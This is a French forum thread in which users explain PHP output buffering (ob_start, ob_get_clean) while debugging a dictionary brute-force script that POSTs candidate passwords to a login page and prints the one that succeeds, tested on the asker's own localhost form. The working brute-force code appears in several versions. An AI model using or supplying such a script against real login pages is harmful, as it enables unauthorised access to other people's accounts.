[Php] ob_get_clean

[romain95]

Bonsoir à tous,

Voilà j'ai suivis plusieurs fois ce tutoriel et aujourd'hui j'ai besoin de faire un brute forcer php donc j'ai essayé de comprendre le code de cybersee mais je bute.
Le code :

Code :

$url = 'http://[...]/login.php';

foreach ($password as $value){
ob_start();
$ch = curl_init($url);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "password=$value");
curl_exec ($ch);
curl_close ($ch);
$p = ob_get_clean();
if (!strstr($p, "w00t") ) {echo "Le mot de passe est: $value<hr>$p<hr>"; }
}

J'ai comprend tout le code avec le ini_set que je n'ai pas mis et la liste de mot et le explode. Mais je ne comprend pas l'utilité de ob_start() et ob_get_clean() j'ai cherché les definitions sur le site du zéro, php.net, etc.. mais je n'ai rien trouvé à part les mêmes définitions ou exemple à chaque fois.
Et je n'ai pas compris pourquoi le ob_get_clean est dans le fonction strstr et qu'est ce que le w00t ?

La fonction strstr à ce que j'ai compris recupère la suite des caractères après w00t.
ex : $a = n-pn.fr, strstr($a, '.') il va me sortir .info.

Bon si quelqu'un peut m'expliquer avec ses mots ce serait vraiment sympa !!
Bonne soirée à tous, Romain95 !

[Luxerails]

curl_exec() affiche directement la page dans ta page php, elle n'est pas stockée dans une variable.
ob_start() va enregistrer tout ce qui est affiché dans la page dans la mémoire (echo par exemple, ou resultat du curl_exec() ci-dessus), et $p = ob_get_clean() va récuperer le contenu enregistré dans la mémoire tout au long du script depuis le ob_start() et le placer dans la variable $p. C'est tout :p Donc au final $p contient ce qui est affiché sur ta page php cest a dire le résultat du curl_exec().
Exemple:

Code :

<?php
ob_start();
echo 'test';
$p = ob_get_clean();
// $p contient le string 'test'

Sinon pour strstr, c'est exactement ça.

[romain95]

Ah ouais super merci !! mais pourquoi il a mis w00t j'ai pas compris.

[Luxerails]

Je suppose que quand strstr() renvoie false cest qu'il n'a pas trouvé le string en deuxième paramètre (ici "w00t"). Donc apparemment : si il ne trouve pas le mot "w00t", ça signifie qu'on est connecté. À modifier bien sur, par exemple si le bruteforce envoie un mauvais password et que tu sais que ya écrit "Bad password" sur la page, tu peux modifier en : if (!strstr($p, "Bad password") ) par exemple. M'enfin je trouve ça un peu moyen, j'aurais plus utilisé une regexp moi par exemple. Du style :

if(preg_match('/mot ou phrase qui saffiche lorsquon est connecté/', $p))

[romain95]

merci pour tous gars, c'est super !

[romain95]

Malheuresement après une série de test cela ne marche po :'(
Ca ne m'affiche rien alors que admin est bien saisi --'

code de soldat.php :

Code :

<?
$url = 'localhost/site/soldat1.php';
$password = 'pass-admin-pass1';
$explode = explode('-', $password);

foreach ($explode as $tab) {    
    ob_start();
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELD, $tab);
    curl_exec($ch);
    curl_close($ch);
    $p = ob_get_clean();
    if (!strstr($p, 'rreur')) { echo " Le mot de pass est " . $tab; }
}

soldat1.php

Code :

<?
if (!empty($_POST['password'])){
    if ($_POST['password'] == 'admin'){
        echo 'Connected';
    }else { echo  ' Erreur';}
} else { echo 'Erreur';}
    ?>
    <form action="" method="post">
        Password <input type="password" name="password" /><br>
        <input type="submit" value="Se connecter" />
    </form><?

sinon une fois que j'y arriverai je voulais essayé avec un champ login et un champ password et dans le login mettre par default admin et password un array de mot de passe. Bon c'est un autre niveau faut déjà que j'arrive le code ci-dessus

[Luxerails]

Je dis peut-être n'importequoi, je n'utilise jamais cURL, mais je pense que
curl_setopt($ch, CURLOPT_POSTFIELD, $tab);
demande les valeurs post sous la forme
post1=val1&post2=val2..

Donc essaye de changer cette ligne par
curl_setopt($ch, CURLOPT_POSTFIELD, "password=$tab");

[romain95]

Sur le moment j'ai cru que tu avais raison !! mais ça ne marche pas c'est bête.
Faudrait que Cybersee passe par là comme il a déjà fait ce script !
merci de ton aide encore!

[Luxerails]

Normalement il faut faire comme je t'ai dit pour envoyer les données POST (voir la doc sur curl). Donc le problème est ailleurs. Il ne te sort pas d'erreurs ?
Essaye de remplacer
$url = 'localhost/site/soldat1.php';
par
$url = 'http://localhost/site/soldat1.php';

Code :

<?php
$url = 'http://localhost/site/soldat1.php';
$password = 'pass-admin-pass1';
$explode = explode('-', $password);

foreach ($explode as $tab) {    
    ob_start();
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELD, "password=$tab");
    curl_exec($ch);
    curl_close($ch);
    $p = ob_get_clean();
    if (preg_match("/Connected/", $p)) { echo " Le mot de pass est " . $tab; }
}

[romain95]

Sa me saoule à mort que ca ne marche pas, ta démarche est logique et bonne en plus.
Rien ne s'affiche et quand je met un ! a preg_match ça m'affiche trois phrases avec les trois password c'est vraiment bizarre...

[Luxerails]

En tout cas c'est vraiment la merde curl et les fonctions ob. Moi j'aurais fait comme ça :

Code :

<?php
$url = 'http://localhost/site/soldat1.php';
$password = 'pass-admin-pass1';
$explode = explode('-', $password);

foreach ($explode as $tab) {
    $data = "password=$tab";
    $context = array ('http' => array ('method' => 'POST', 'header'=> "Content-type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen($data) . "\r\n", 'content' => $data));
    $context = stream_context_create($context);
    $p = file_get_contents($url, false, $context);
    if (preg_match("/Connected/", $p)) { echo " Le mot de pass est " . $tab; }
}

La si ça marche pas je peux plus rien faire.

[romain95]

Ba gg faut que j'apprenne cette syntaxe de code merci à toi !

[CyberSee]

Je viens de retester et le script fonctionne de mon côté. À noter que si tu ne mets pas le code ini_set le script peut être arrêté avant la fin de son exécution. Évidament le w00t dois être changé pour un mot qui affiche a l'écran quand une connexion est réussie. À l'inverse tu peux aussi le faire sous forme négative et mettre un mot qui apparaît quand il y a une erreur.

[romain95]

Coucou CyberSee,

J'avais pas régler le ini_set mais il n'y avait que trois mots donc je pense que ça ne prend que quelques secondes même pas. Sinon je vais retester avec la manière de Luxerails (que je remercie) et celle de curl (la tienne).

Cordialement, Romain95 !

[CyberSee]

Si tu veux, met ton formulaire en ligne avec un dictionnaire et je ferais des tests aussi